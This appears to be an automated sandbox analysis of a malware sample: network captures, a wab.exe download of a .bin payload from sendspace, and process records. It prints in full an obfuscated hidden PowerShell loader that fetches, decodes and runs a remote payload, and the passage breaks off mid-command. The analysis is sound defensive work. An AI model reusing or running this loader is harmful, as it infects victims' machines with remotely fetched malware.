                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 69 4e 67 33 65 37 56 66 69 4e 65 6f 7a 79 38 6b 2b 4e 54 5a 31 41 34 79 59 6d 74 73 71 57 75 56 35 66 77 69 76 2b 35 42 63 34 72 54 4c 38 44 56 57 4e 69 70 72 61 42 32 51 34 6e 66 74 6d 61 37 57 4e 75 73 4e 68 32 75 4c 75 77 6f 57 65 75 45 47 52 51 57 41 68 41 52 4c 54 4a 68 72 76 4d 59 30 44 5a 48 31 42 58 56 52 46 51 54 32 46 43 73 59 41 74 31 74 70 52 74 34 63 56 47 48 45 57 4c 6c 63 4a 32 4f 74 7a 55 4e 73 6f 58 44 50 59 4b 6a 50 4b 4f 59 4d 74 6b 34 63 43 6d 54 34 51 2f 63 4d 65 62 6c 52 67 4e 72 38 57 67 77 6a 34 71 30 44 76 6f 70 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 62 6c 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 62 6c 65 44 48 6d 35 58 67 77 34 35 52 6d 78 70 48 4e 39 37 4f 68 7a 41 65 74 4e 47 58 33 68 77 44 44 62 62 33 75 35 58 76 39 32 66
                                                                                                      Data Ascii: iNg3e7VfiNeozy8k+NTZ1A4yYmtsqWuV5fwiv+5Bc4rTL8DVWNipraB2Q4nftma7WNusNh2uLuwoWeuEGRQWAhARLTJhrvMY0DZH1BXVRFQT2FCsYAt1tpRt4cVGHEWLlcJ2OtzUNsoXDPYKjPKOYMtk4cCmT4Q/cMeblRgNr8Wgwj4q0DvopeDHm5Xgx5uV4MebleDHm5Xgx5uV4MebleDHm5Xgw45RmxpHN97OhzAetNGX3hwDDbb3u5Xv92f
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 74 50 2b 48 38 6c 38 49 75 6b 33 2f 72 45 71 34 57 49 2b 48 39 54 50 53 53 6a 31 7a 72 4e 43 4a 56 72 76 34 76 54 64 41 79 73 43 6e 6c 4f 66 35 74 39 54 38 70 50 4c 4b 37 4b 72 6d 6e 31 48 6d 75 76 50 44 32 6e 2f 54 35 77 53 53 79 6b 47 63 4f 37 64 47 4a 6b 4c 51 58 66 30 2f 38 61 77 72 56 53 45 61 45 55 49 2f 45 34 61 69 67 61 4b 7a 6b 6e 74 58 53 68 64 51 66 6f 63 75 71 4c 5a 4f 4e 47 6a 4a 4f 65 61 55 6f 36 47 77 33 77 43 61 79 50 46 73 52 6b 75 6c 52 44 2b 5a 41 53 4e 41 4d 59 2b 77 77 52 69 45 67 6f 35 70 31 56 43 59 6d 4e 54 5a 30 67 79 64 58 7a 55 51 31 6d 42 6c 34 4d 65 62 6c 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 62 6c 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 62 6c 65 44 43 62 55 34 77 71 75 63 6b 6b 6a 2f 73 7a 45 6a 58 32 64 70 65 35 69 72
                                                                                                      Data Ascii: tP+H8l8Iuk3/rEq4WI+H9TPSSj1zrNCJVrv4vTdAysCnlOf5t9T8pPLK7Krmn1HmuvPD2n/T5wSSykGcO7dGJkLQXf0/8awrVSEaEUI/E4aigaKzkntXShdQfocuqLZONGjJOeaUo6Gw3wCayPFsRkulRD+ZASNAMY+wwRiEgo5p1VCYmNTZ0gydXzUQ1mBl4MebleDHm5Xgx5uV4MebleDHm5Xgx5uV4MebleDCbU4wquckkj/szEjX2dpe5ir
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 38 4f 45 54 6a 72 54 48 75 35 58 6e 36 43 46 56 4b 4e 7a 50 6c 63 44 48 6d 38 2f 70 73 53 33 36 6e 4e 4e 36 7a 66 6f 54 6d 37 58 67 77 5a 2b 49 70 4d 48 7a 69 6e 4b 6e 62 37 6f 59 45 35 75 31 34 4d 44 45 36 6f 7a 72 58 37 4f 44 57 67 66 6c 78 6a 76 44 64 50 6a 56 4d 4a 4a 31 75 42 4f 47 78 71 4e 4f 77 42 6a 55 74 71 58 2f 57 77 4d 4e 75 41 65 4c 6c 65 74 49 56 4a 72 44 38 6f 41 4a 59 4d 65 62 6e 66 39 62 51 56 6d 33 56 32 4e 4f 76 70 65 72 6b 48 4f 51 76 41 54 37 31 4d 74 5a 76 71 7a 54 72 6a 6f 48 6d 35 58 6d 4a 32 50 62 44 62 68 6b 5a 72 69 6a 57 38 61 50 52 42 63 56 2f 4f 38 6a 7a 53 44 58 6d 35 6d 51 34 41 4a 31 6d 44 6a 6e 72 45 72 43 65 32 33 77 36 6f 44 4c 45 53 2b 49 76 2b 53 41 48 6c 33 79 5a 72 62 37 6e 4d 76 6a 7a 32 44 58 6d 35 61 67 6a 34 42
                                                                                                      Data Ascii: 8OETjrTHu5Xn6CFVKNzPlcDHm8/psS36nNN6zfoTm7XgwZ+IpMHzinKnb7oYE5u14MDE6ozrX7ODWgflxjvDdPjVMJJ1uBOGxqNOwBjUtqX/WwMNuAeLletIVJrD8oAJYMebnf9bQVm3V2NOvperkHOQvAT71MtZvqzTrjoHm5XmJ2PbDbhkZrijW8aPRBcV/O8jzSDXm5mQ4AJ1mDjnrErCe23w6oDLES+Iv+SAHl3yZrb7nMvjz2DXm5agj4B
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 78 36 33 64 70 58 6a 5a 4e 4a 61 75 49 32 4f 4a 7a 76 33 48 6a 70 6a 5a 4e 6b 79 61 61 5a 4d 47 52 4b 67 56 53 48 4e 30 61 77 78 64 56 6b 45 6a 6a 38 4b 58 79 6a 4b 64 53 53 30 74 49 2f 35 77 7a 4f 52 31 43 62 36 4e 70 69 58 6b 73 6d 6b 6c 6e 39 58 51 4d 47 2b 70 50 55 79 61 68 31 57 75 47 54 66 32 6b 45 61 6e 5a 2b 61 51 78 35 75 56 34 4d 65 62 6c 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 62 6c 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 65 4e 66 47 65 6a 69 35 6f 63 45 6d 51 79 32 64 62 6b 77 33 2f 68 4c 67 38 58 48 32 74 2f 2b 71 48 47 4f 76 43 6b 6c 31 2b 78 77 71 63 4d 30 73 4d 70 39 51 4b 32 4f 54 45 71 57 48 63 72 69 50 49 34 49 50 35 2b 32 56 4d 59 79 50 56 65 31 55 41 77 55 4a 70 64 32 39 46 6c 6b 69 35 4a 53 35 66 59 36 57 59 59 32 70 34 61 42 50
                                                                                                      Data Ascii: x63dpXjZNJauI2OJzv3HjpjZNkyaaZMGRKgVSHN0awxdVkEjj8KXyjKdSS0tI/5wzOR1Cb6NpiXksmkln9XQMG+pPUyah1WuGTf2kEanZ+aQx5uV4MebleDHm5Xgx5uV4MebleDHm5Xgx5uV4MeeNfGeji5ocEmQy2dbkw3/hLg8XH2t/+qHGOvCkl1+xwqcM0sMp9QK2OTEqWHcriPI4IP5+2VMYyPVe1UAwUJpd29Flki5JS5fY6WYY2p4aBP
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 63 4c 35 44 32 50 66 48 48 5a 49 76 43 62 6d 4e 34 30 68 4e 63 57 51 69 53 35 72 48 66 33 67 58 48 46 44 33 71 4f 34 51 4b 4c 6f 54 41 61 75 4f 4b 42 59 50 39 34 51 4a 4a 69 46 79 57 32 69 73 4e 50 62 6d 58 57 44 32 4c 72 4c 6a 53 6f 35 6d 62 6a 49 65 67 4e 74 7a 5a 62 79 42 6a 34 65 75 70 54 59 59 33 66 2f 33 72 36 38 55 51 72 4a 64 66 75 65 4b 50 44 61 76 78 33 4b 68 52 6e 53 58 6e 4c 38 34 4f 44 36 6d 70 54 57 72 72 4f 6b 6a 72 2f 72 68 65 79 4e 62 4f 47 37 55 70 4b 42 78 71 38 57 6f 51 35 4d 69 45 42 7a 71 43 64 6e 35 57 63 51 56 63 45 4e 62 4c 69 31 59 46 6c 75 31 34 4d 68 73 78 36 35 50 49 38 58 51 77 67 36 65 61 6a 74 79 64 32 4f 55 57 51 33 69 78 38 41 6e 54 74 6a 6a 42 4f 71 76 61 7a 37 44 78 78 64 32 37 76 44 6a 32 2f 42 4b 48 42 64 79 50 6c 66
                                                                                                      Data Ascii: cL5D2PfHHZIvCbmN40hNcWQiS5rHf3gXHFD3qO4QKLoTAauOKBYP94QJJiFyW2isNPbmXWD2LrLjSo5mbjIegNtzZbyBj4eupTYY3f/3r68UQrJdfueKPDavx3KhRnSXnL84OD6mpTWrrOkjr/rheyNbOG7UpKBxq8WoQ5MiEBzqCdn5WcQVcENbLi1YFlu14Mhsx65PI8XQwg6eajtyd2OUWQ3ix8AnTtjjBOqvaz7Dxxd27vDj2/BKHBdyPlf
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 36 46 76 37 6f 65 4d 45 42 36 62 2f 4d 66 67 49 32 46 75 6a 69 64 2b 4d 78 74 56 6f 32 53 52 65 72 59 63 54 44 72 58 58 75 35 58 6f 30 45 78 66 76 45 65 62 6c 52 67 32 4b 56 6f 66 50 48 56 73 6f 55 61 54 69 77 56 75 2b 4c 5a 6f 32 2f 75 63 45 56 58 44 69 59 5a 78 75 35 58 54 56 4b 4d 75 74 64 65 37 6c 65 41 2f 33 6f 58 51 78 35 50 62 4f 48 4d 72 58 61 33 48 68 49 31 56 39 78 33 36 6e 4f 50 55 4c 58 6b 66 47 34 58 67 7a 43 4c 4a 42 73 31 6a 6d 6b 48 53 6f 43 4f 4c 6b 31 2b 74 2f 33 6b 72 6c 65 44 48 59 33 2f 31 6c 36 75 51 57 4e 69 72 44 30 67 62 4d 34 72 61 33 35 72 41 4b 4e 69 71 79 36 39 45 41 35 6f 71 70 34 59 64 57 52 38 62 68 65 44 50 41 38 49 77 35 35 75 61 6e 4c 6c 53 6f 64 53 38 45 51 58 55 2f 47 50 59 55 35 6e 73 4a 36 50 42 2b 41 6a 54 6e 72 6b
                                                                                                      Data Ascii: 6Fv7oeMEB6b/MfgI2Fujid+MxtVo2SRerYcTDrXXu5Xo0ExfvEeblRg2KVofPHVsoUaTiwVu+LZo2/ucEVXDiYZxu5XTVKMutde7leA/3oXQx5PbOHMrXa3HhI1V9x36nOPULXkfG4XgzCLJBs1jmkHSoCOLk1+t/3krleDHY3/1l6uQWNirD0gbM4ra35rAKNiqy69EA5oqp4YdWR8bheDPA8Iw55uanLlSodS8EQXU/GPYU5nsJ6PB+AjTnrk
                                                                                                      2024-05-23 19:08:10 UTC16384INData Raw: 48 41 68 58 50 66 2f 57 58 75 6a 4c 66 34 53 43 6e 72 62 59 54 66 35 64 62 52 6e 71 33 77 71 45 43 4a 4a 58 76 4e 64 33 51 5a 77 4f 30 72 47 33 62 61 70 6d 2f 73 4d 74 57 48 38 4d 74 55 35 35 6e 34 35 42 48 77 4b 45 32 52 41 78 76 72 50 49 6e 39 6e 38 55 65 44 44 64 4d 2f 6c 58 34 6c 58 72 51 61 46 4a 62 6a 55 32 64 33 66 43 30 48 4a 4a 65 78 62 6b 69 79 43 63 52 5a 45 69 70 31 4b 39 78 52 30 30 2b 55 41 5a 63 75 69 34 63 66 73 4c 70 52 7a 4f 35 76 49 73 76 6c 54 38 34 56 59 76 64 6a 4a 67 4c 53 33 59 73 37 45 77 46 75 57 4b 55 73 39 46 41 34 47 4b 68 55 51 32 4a 31 46 34 4d 65 62 6c 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 62 6c 65 44 48 6d 35 58 67 78 35 75 56 34 4d 65 62 6c 65 44 44 70 35 6f 62 36 48 48 71 46 63 37 31 4a 74 35 76 39 59 73 49 31 4e 6e
                                                                                                      Data Ascii: HAhXPf/WXujLf4SCnrbYTf5dbRnq3wqECJJXvNd3QZwO0rG3bapm/sMtWH8MtU55n45BHwKE2RAxvrPIn9n8UeDDdM/lX4lXrQaFJbjU2d3fC0HJJexbkiyCcRZEip1K9xR00+UAZcui4cfsLpRzO5vIsvlT84VYvdjJgLS3Ys7EwFuWKUs9FA4GKhUQ2J1F4MebleDHm5Xgx5uV4MebleDHm5Xgx5uV4MebleDDp5ob6HHqFc71Jt5v9YsI1Nn


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.1049718104.21.28.804438172C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-05-23 19:08:48 UTC175OUTGET /pro/dl/ougyql HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Host: www.sendspace.com
                                                                                                      Cache-Control: no-cache
                                                                                                      2024-05-23 19:08:48 UTC946INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Thu, 23 May 2024 19:08:48 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: SID=5hrvd3jvoolunq5gv3jhegf975; path=/; domain=.sendspace.com
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Pragma: no-cache
                                                                                                      Location: https://fs03n4.sendspace.com/dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin
                                                                                                      Vary: Accept-Encoding
                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PC40M0Bx2cpmJ%2FACmR1k7fM3W0C0bQ3wXfYvxOQ9TSMHsfMPezNDCmUplRvRrEciO4S3avYA9rlrR8wleJMkrU2xxMOPYQUFaREq1IW%2Fn%2BRqHH59VR2XAjoIukNYzc8qO1aJuw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 88875632cc6943c2-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      2024-05-23 19:08:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.104971969.31.136.174438172C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-05-23 19:08:49 UTC304OUTGET /dlpro/b38ae3db991f0ad99006fe4234117e3b/664f9440/ougyql/mvQWivKaVtxblG80.bin HTTP/1.1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                                                      Cache-Control: no-cache
                                                                                                      Host: fs03n4.sendspace.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Cookie: SID=5hrvd3jvoolunq5gv3jhegf975
                                                                                                      2024-05-23 19:08:49 UTC428INHTTP/1.1 200 OK
                                                                                                      Server: nginx
                                                                                                      Date: Thu, 23 May 2024 19:08:49 GMT
                                                                                                      Content-Type: application/octet-stream
                                                                                                      Content-Length: 34368
                                                                                                      Last-Modified: Fri, 17 May 2024 15:08:35 GMT
                                                                                                      Connection: close
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                      Content-Disposition: attachment;filename="mvQWivKaVtxblG80.bin"
                                                                                                      ETag: "664772f3-8640"
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-05-23 19:08:49 UTC15956INData Raw: 10 45 d0 3b 03 0b c6 30 24 2a 31 e3 f4 17 42 a6 55 7c 1f f7 1f d8 9f 75 4a 3c 70 f7 b5 77 b9 ae d3 49 d7 12 3f 20 0d a5 d3 28 e6 13 ec 63 81 07 8b 2a 02 35 a6 1a 02 54 e6 39 14 cd cf fd 88 a0 a1 fe 5c bc 1f 67 75 a1 63 be 53 45 52 2a d2 5e 24 b3 e7 69 8b f4 7c 7b 24 f0 60 25 bf 50 1e cc 7c cf d2 09 ba 9d e2 9b f9 a7 a5 69 b4 d1 b0 e7 b1 da c6 6b 65 fe 87 77 dd d0 f3 d8 d7 b5 47 38 95 4d 96 8a 48 6b ef 85 c0 14 04 4a 78 80 7a ec fe c4 c1 f4 91 21 63 e5 a3 92 9e 19 8b 8d be 4d b6 96 33 4a e8 ed 69 50 05 02 31 1e b4 e7 b8 15 e1 ab 55 b5 ee 5c 00 6e 42 d9 9b f6 38 59 f2 ad e5 ee 45 72 53 f4 c8 e2 e2 5a c0 45 4e e7 bd 17 24 aa 56 4e d9 e3 b8 39 a7 bf c8 bc 17 b1 81 db ec 32 f3 37 f5 87 5c 9d ff a3 8f a1 f2 28 3a 47 ec 5b c6 7f fd cb bd 24 06 30 65 50 1a 60 e9
                                                                                                      Data Ascii: E;0$*1BU|uJ<pwI? (c*5T9\gucSER*^$i|{$`%P|ikewG8MHkJxz!cM3JiP1U\nB8YErSZEN$VN927\(:G[$0eP`
                                                                                                      2024-05-23 19:08:49 UTC16384INData Raw: 4c fd 4a d7 82 5b b4 8b 0b 52 ef 38 d3 26 49 ac db 94 d6 ef 21 41 ad 76 5e b3 34 57 cb 5d 10 20 05 f1 95 f9 ca c1 fc 32 81 88 aa 39 d1 cd 18 af db 08 1f 21 97 39 ae b1 c7 96 bc 00 f2 de e7 2e fb a3 2c d7 7d 4e b0 23 78 11 6e db 49 12 92 8a 10 43 62 d3 c8 98 4e 86 2f 51 63 ca 1d 72 4d 04 2b 4b 0b 7e 90 82 6f 26 1d 45 6c d7 d8 4c af 35 fd 24 65 74 52 66 c9 d9 5a 49 ff 15 7b 9c a1 60 b5 45 49 ef e8 48 37 3c 7a 4e 98 95 6c 2d de 15 50 f0 94 09 3c 5b 98 6e 18 36 91 9c d6 3f a6 a1 ce cc ba 79 b5 6b 83 c1 a3 ff 37 fa cf 8c f0 85 98 cf 9e d4 fc ac 8c b7 07 16 9f 42 b7 65 a3 eb 19 17 c8 e3 7f c6 47 16 81 97 9b ae 55 5f 6e f4 77 60 2f 1f a5 4b 1d ae 07 b9 a9 7a c3 41 b2 dc 66 e8 c6 6a 21 4d 22 9a 69 e7 a6 c5 8d 08 7d b7 04 c4 87 bf 8d c0 64 a4 bc 5d 07 51 20 2e 7e
                                                                                                      Data Ascii: LJ[R8&I!Av^4W] 29!9.,}N#xnICbN/QcrM+K~o&ElL5$etRfZI{`EIH7<zNl-P<[n6?yk7BeGU_nw`/KzAfj!M"i}d]Q .~
                                                                                                      2024-05-23 19:08:49 UTC2028INData Raw: 68 ef c5 c5 2f 3c 7b 4e 8d 98 6c ad df 15 b5 f3 94 09 3d 5b b8 6a 18 36 90 9c 3b 3c a7 a1 cf cc 06 7a b5 eb 82 c1 f3 fb 37 fa ce 8c 91 81 98 cf 9f d4 93 a8 8d b7 05 16 85 46 b7 e5 a2 eb 88 13 c8 e3 7d c6 e7 12 81 97 98 ae fc 5b 6e f4 73 60 05 1b a5 4b 18 ae ab bd a9 7a c5 41 01 d8 66 e8 c1 6a 9b 49 22 9a 61 e7 f0 c1 8d 08 dc 17 ee c0 c3 9d 8f c0 96 a0 bc 5d 04 51 db 2a 96 64 a5 f4 7c 58 80 f0 69 b0 c9 4c 06 f1 63 41 67 3e 4c 2b 22 b9 f6 49 18 b0 93 6d 0d 64 31 d2 d1 13 61 7e 28 5f 48 c8 90 54 43 69 72 cc fc 6d 85 25 0c 81 7a 04 30 cc 84 60 40 57 83 e9 3a 12 12 3f bc b6 3a 94 c2 87 47 20 27 a6 53 68 05 99 a2 cc be cb 9c 98 14 34 30 5c 29 21 e9 b6 99 9c d1 d0 7e 5d 30 7b e6 25 b6 b7 87 a3 a8 a4 cc bc 1d 67 23 a1 06 be 21 45 eb d5 bb 5e f0 b3 82 69 c2 f4 12
                                                                                                      Data Ascii: h/<{Nl=[j6;<z7F}[ns`KzAfjI"a]Q*d|XiLcAg>L+"Imd1a~(_HTCirm%z0`@W:?:G 'Sh40\)!~]0{%g#!E^i


                                                                                                      Statistics

                                                                                                      CPU Usage

                                                                                                      Click to jump to process

                                                                                                      Memory Usage

                                                                                                      Click to jump to process

                                                                                                      High Level Behavior Distribution

                                                                                                      Click to dive into process behavior distribution

                                                                                                      Behavior

                                                                                                      Click to jump to process

                                                                                                      System Behavior

                                                                                                      General

                                                                                                      Target ID:0
                                                                                                      Start time:15:08:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\xff.cmd" "
                                                                                                      Imagebase:0x7ff73b120000
                                                                                                      File size:289'792 bytes
                                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:1
                                                                                                      Start time:15:08:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff620390000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      General

                                                                                                      Target ID:3
                                                                                                      Start time:15:08:04
                                                                                                      Start date:23/05/2024
                                                                                                      Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:powershell.exe -windowstyle hidden "$Shave = 1;$Stikningens='Sub';$Stikningens+='strin';$Stikningens+='g';Function Sideblikkets($Missel){$Wandoo=$Missel.Length-$Shave;For($Unisexuality=5;$Unisexuality -lt $Wandoo;$Unisexuality+=6){$Berseems+=$Missel.$Stikningens.Invoke( $Unisexuality, $Shave);}$Berseems;}function Mekhitarist($Starchflower){& ($Plukningernes) ($Starchflower);}$Skolekommissionerne=Sideblikkets 'kedelMSepteoAk dezHund.iLivsflAesculBloksaCo ds/ Call5pred,.Tizwi0Liebh P ery(MaalbW.ormaiReklanSonnedNdst.oUneffwNonadsBen.i Obs rNSt.anTApert D cum1Zolao0Sel.k.Raad 0Impen;Blodh N,nclW.aldyiT lelnDagui6Midal4Cicer;genne S.llex ype6 C,ys4 Ord ;Paras ,attr Seigv Trem:a pro1 Dubh2Varme1 Glan.Skand0 Cucu)skatt F adrGUndere OuttcP,litkLandooAspa / Benb2 Genf0Outfi1Crim.0Af.an0Amphi1Warri0Theca1 Komm BosomFUrovaiFar,brBoateeVoco.fAralkoFacadxFysio/ Jess1marke2Ta.sh1Miili. Rang0Store ';$Forvaltningsmyndigheden=Sideblikkets 'Eksp USkr,bslucinePrel,rSkakt-YoghuAP pelgFilt.e haln Endet aks, ';$Disgustful=Sideblikkets ' hedhOverntrothet Ind.p DeacsBlued:Speac/U,clo/ TraswPseudwDaanewProca.Dissis Ras.eStjernPrededRednisTemaspD.fraaIndrec Helle A st.Acentcthorao draem Fed,/Statip,illbrnrbeso A.oc/ExactdBistnl Club/Postuo utscwNiger9fuldf1Stoic4Bisto8Bikag ';$Fangstkvotaer=Sideblikkets 're te> Laur ';$Plukningernes=Sideblikkets 'Sa,spiTapiseHell.xkomma ';$Fertilizables='Indkapslingerne140';$Koden = Sideblikkets ' P gleDtsilc.msvbh S eeo Ex.u digit%Supe,alevi p .erjpStrumdBe ikaStridtDat.taStand%Prokl\BoligTUlykki ForydFaxeheStor,rKokko. P,stDSaturrSoutre over S,ilo&Desig&Rang Kon re Ty.ec ModehSupinoFre e NadintLindi ';Mekhitarist (Sideblikkets 'Machi$ParengFrokolNage oBes.obFormuaKommul Syll:AktioMCloseiForfrsBrig tDonkeeSteg,rGaleo=Falsi(Gan.hcMislam,elatd Trid Busse/,iscocKomme nonsu$UnchaK PileoDoigtdYojane DistnTripl),rrit ');Mekhitarist (Sideblikkets 'Adres$nonbrg TilslStillo TongbHavneaHerrelProle:PinctDFaseraV,sicgIn,ulu haboe LapnrradiorLae,eeJalteoTubert DrifySandwp,nfori LeareStalkn,pildsProbl=Trekv$ZoogeD UmbriF,ftes InspgFlaxwuNon,psMuscatBo,caf dumpuF.renlOrnit.Ra.posPreprpS riel P.opiJerbot Nece(Cauli$Micr,FUnpr.aFr,ngnL,berg Af,us ungst Sk,lk Sph.vSte eoHaanltS,antaKrepeeRyaerrFo,mu),ehan ');$Disgustful=$Daguerreotypiens[0];$Unsingularness= (Sideblikkets 'Dugou$ rosegGreenlPr.yeoCoxswb Nesha HofmlNonbu: Bjf.BKoordesubs,b L.mpu UnkndS.ggeeNyserrBe.senEm greEvn,nsMinds=flaadNHjerte UnslwDoubt- WhitORonkebfunktj,enopeSpo.vcDokumtHym n tilgS FantySmagls yruptFougueKlampmTottl.sondeNDecigeK jsetpaleb.ChlamWFla,keThronbKrofoCPuls,lgordiiglauceBehovnTandbt');$Unsingularness+=$Mister[1];Mekhitarist ($Unsingularness);Mekhitarist (Sideblikkets 'Neg,e$RadioB,ndule HjembIntrauS.cerdNonpeeKabelrBrugen T,leeunhe.sCeteo. ,omiH RegneSk rpaHelvedGa ewe UdstrSupersBomae[Bletr$sandsFSlaveoDummerVentovBr ebakalfalSkulktAbsolnDesilif,rhanSopragAktiesKl mam Mic.yPe,ronIndi d P,gui fy.ig ,avnhPals,eSkaded Ich.eDaudinKonsu]Wor,h=malap$.emasSTnneskschoooBu,ealSporteHydrak rozeoMa esmOrl,gmNaplei Pa ksAt,rissaucei Rea oSamfunDeprieNo purOpsprnPreceeKlang ');$Bortfjernelsernes=Sideblikkets 'Frems$PensiBLivvaeSa,rabUoveruAlexadAfreteAlimerBjrndnU.odieSvmmes iala.Is.spDForfroBortvw KoolnServilEntreoTelefa,uperdFantoFWillyiSemisl,eroleEng.n(Minid$VelgeDHoldoiTurf s.imssgK shkuEpiscs ,esktIndfdfHealtu AarelCoyot, Bomb$ ProdRAgg.eePostulTydnia Imprt NajaiSpir,v nmarp.ignar TricoLu acn S shoparthmSu areTilban ZincePassir frgenErudieSogne) Akkr ';$Relativpronomenerne=$Mister[0];Mekhitarist (Sideblikkets 'Unrig$KoopegMelanl S,dboDanmabFiskeaSyndflCurcu:DejkrV nobeaTransl Speae B rtr Un,giAer.taHaw nn AfhraCitedtKn.aseVarie=Sha,f(overtTMa.neeFedtesDyrevtK.nsp-familPCoenzaBlgeft P.eehSemit Sej s$ XiphR DavyeGrowsl.ntriadecret Herlia ousvdip op Tegnr.etsbo Be en Skalo SagkmCottoe Elefn KonseEdriar Me.knBaubeeTopno) Tefe ');while (!$Valerianate) {Mekhitarist (Sideblikkets 'Mondr$ DuctgPulisl remgoFo,elbForfoaInf.rlCellm: orchLlufteoHensllKnsroi DetauAguismStn n=Modif$Derm,tSentar ejenuSh,uce.rein ') ;Mekhitarist $Bortfjernelsernes;Mekhitarist (Sideblikkets 'StridSFre.ntInhauaDisd.rPaleot Demi-OversSForsklGenneeTickleSla tp,riva B anc4Sub,r ');Mekhitarist (Sideblikkets 'mu.pi$Genneg,haprl M,tooImmunb AmylaGarvll Sti :MasseVPote.aMad elFordreTommyrBlid,iChalcaSt ejnHyleraTalertpho oe Unco=Visko(BecloTForuneVampisHj rnt Igno-DatisPMindeaCharlt emilhRejsh Tildi$HystrRJosepeT,aumlUdkigaNemictSammeiTangfvrekompInterrExtraoFla.bnGeneroSamstmAnapheFrekvnSy doeCap.irTu.slnRottee Gast)Acido ') ;Mekhitarist (Sideblikkets ' Ofr.$SudatgPiro lFucoxoyver,bCl.staSkovflNone,:ColliHSombruam itgDrbeloUfornrBeridmOve,penontrbNuncgiun urdEnsom=Attr $MoplagMandil PicroStvb,bFiltraLi.uelMine.:RheinN MaalaSpondeParreg.ickeaAerodiFoin tJewel+Fa.se+Tirre% Tarv$ProcoDdigekaD,nebg O eruSupereRe.harAwakerKursneIllegoFolketI lomyacutip Tro iHoroueMor.in Bisms Repr.Erhvec DismoUniveu Persn ambrtsilic ') ;$Disgustful=$Daguerreotypiens[$Hugormebid];}$Uncoincident=320251;$Vasiferous=29255;Mekhitarist (Sideblikkets 'Amphi$tryl g GlislRykkeoshallbPyromaAcrosl ,oui:Kumm.gPremuaOejnelHelgevforn aDi,cinCrippoFormit TaleaAggrecSplint unicijodl.c Ove. Taell=Ukamp TildaGTrompeChequtFrogg- ofllC InhaoPrebanKl,nktFrsteeSubminSaddltBlok. Wahim$ FlodRCoodle RikolPol,pa TvebtBliveigruppv Dyrep slamrUdvekoIteminTro.boOakykmChicaeSpecin TugteAppl,rBast.nAlloeeProvo ');Mekhitarist (Sideblikkets 'Bantu$TilingJocunlAnthro Mu kb udv.a KimblEncy :UdbydCTransoSab.enHomagv ShinoBaldulSmeltvRideeuChirol AnaluA,utisObli.e AxilsTrele6 Spid2Fo,la Reasc=Tortu Sekle[ PinaSHoiseyA,falsPyntetFu nee F.rhmV,cef.IndenCAryepoVi sen HavavBrneae Opfyr luertNonau]Grout:Udlic:B,rkeF kinrs ltyo FyrtmFa.veBMagniadyrtisTaurie Chon6 Natu4Che,aSKonjetkluntrE.bedi Plagn ortg Linj(aabne$VitelgTimefa undelStyrmvA.beja.ogren .issoHellit,ebetaLyv.ncM,wkitTiptiil tercCemen) M rq ');Mekhitarist (Sideblikkets 'Frank$Ac,uigOntoglOsculoReelab S lpaUnimpl anti: BrisV vantaSkrivl Tal 